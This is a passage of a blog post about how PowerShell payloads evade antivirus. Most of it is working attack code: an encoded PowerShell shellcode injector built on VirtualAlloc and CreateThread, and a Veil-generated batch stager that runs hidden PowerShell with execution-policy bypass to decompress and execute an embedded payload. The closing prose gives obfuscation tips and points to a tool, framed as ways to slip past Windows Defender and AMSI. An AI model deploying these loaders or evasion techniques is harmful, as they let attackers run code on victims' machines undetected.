AAwACwAMAB4ADgAYgAsADAAeABhADYALAAwAHgAMgA1ACwAMAB4ADUAOAAsADAAeAAwADkALAAwAHgANgA4ACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANABhACwAMAB4AGEAYQAsADAAeABjADUALAAwAHgAYQBiACwAMAB4ADEANgAsADAAeABkADMALAAwAHgAMAA2ACwAMAB4AGQANAAsADAAeABkADgALAAwAHgAMQAyACwAMAB4AGMAYQAsADAAeAAwADUALAAwAHgAMgBhACwAMAB4ADUAMwAsADAAeAAxADIALAAwAHgANwA0ACwAMAB4ADcAZAAsADAAeABiADUALAAwAHgANQAzACwAMAB4AGIAOAAsADAAeAA0ADkALAAwAHgAYwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAByAFUAdABnAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAByAFUAdABnAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAByAFUAdABnACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBGAEYAKQApADsAJABQAFQAdwAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAFEASgBIACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGkAUQBKAEgAIAAkAFAAVAB3ACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAVAB3ACAAJABlACIAOwB9AA=='”

Payload created with the Veil:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJt2s8FeDAP+IvgOpqJEV0odQVDy3aan1uaNteeyXWquqRYY+vOa0Oe0iAM3HMjc1yhQrjAMyldED3yeeUH9D3zTM0nscYWWK9H4NlyTfo854yzq7Ddq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQ2Y+78Z+LPVL5nWO2sdEYwda7NZYV5XGXvUjWRRg0q06HFdhcIBt3O7pXjt4jnfFFXTjlkZqxkQ+5XiiMOCvpzrZeQJzLU5E0bYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T9ng+J5j9X5gLhaWdUadFEOkjK3Dla2qpp0HFAw+GLF5bFQZ1+RH1Hyzjb9LMsYxhkkbdzfl1pkgWmTzNpygnalRTo0k+5dctcNS00Zd1UEDLu2/PbmIXBJt2VPYpi+CnC00e7rrePjxXjYBM3kL2cmAnllpKJQiwhmaAwegGHB4Ms24qcxPJx+wM=\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”) else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJt2s8FeDAP+IvgOpqJEV0odQVDy3aan1uaNteeyXWquqRYY+vOa0Oe0iAM3HMjc1yhQrjAMyldED3yeeUH9D3zTM0nscYWWK9H4NlyTfo854yzq7Ddq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQ2Y+78Z+LPVL5nWO2sdEYwda7NZYV5XGXvUjWRRg0q06HFdhcIBt3O7pXjt4jnfFFXTjlkZqxkQ+5XiiMOCvpzrZeQJzLU5E0bYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T9ng+J5j9X5gLhaWdUadFEOkjK3Dla2qpp0HFAw+GLF5bFQZ1+RH1Hyzjb9LMsYxhkkbdzfl1pkgWmTzNpygnalRTo0k+5dctcNS00Zd1UEDLu2/PbmIXBJt2VPYpi+CnC00e7rrePjxXjYBM3kL2cmAnllpKJQiwhmaAwegGHB4Ms24qcxPJx+wM=\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”)

You can see three cases of payloads which are encoded and all of them are slightly different. But the point all of them is, when they get executed the powershell decode the string and inject the payload into the memory.

This trick was working for a while, until vendors patched the payloads generated with the moste popular payload generators. But attackers and developers were still updating the payloads with obfuscation and changing signatures. As soon as you change the signature of payload which is not already in antivirus database it could not be detected. Here is the way how this could be done.

For example you can replace powershell commands with the shorten one:

-NoExit = -NoE
-EncodedCommand = -Enc
-Command = -C

and so on…

For example you can obfuscate commands:

Invoke-Expression = “In”+”vok”+”e”+”-E”+”xpre”+”ssion”

Obfuscation could be done on many ways, and I will not dig deep into due to it is really large field and will left this topic for another post. But here is the link where you can find really cool script obfuscator, which makes all heavy lifting for you: https://github.com/danielbohannon/Invoke-Obfuscation

We covered how the powershell payloads were developing with the time and how encoding and obfuscation tricks were used to avoid detection. But unfortunately today it does not work so easy. The reason is that microsoft made really big step forward in security and with the april 2018 update (build 1803) changed the rules of the game. Windows defender get the big update. I mean, now it is not enough just to avoid detection when the payload file is downloaded on victim computer, because when the payload is executed, windows defender after decoding payload, scan the code again. If in the code is included any suspicious command e.g. VirtualAlloc, CreateThread, etc. he will send the code in the cloud for additionally analysis and will stop execution until get sure the code is not harmful. Sometimes it takes a day after you receive notification that the executed file is malicious. So the next step is to obfuscate the powershell payload before it is encoded or even need to recompile the whole code. From the security reasons I will not post the raw obfuscated powershell script, due to avoiding being patched or used for malicious purposes. But I think that I give you tips and orientation where and how to continue the work to create powerful payload which will fully bypass detection. But you also need to take into account that windows defender ATP is integrated with AMSI, which is very effective against obfuscation. Remember, there is always the way.

Please follow and like us:
error

Add a Comment

Follow by Email
Facebook
Twitter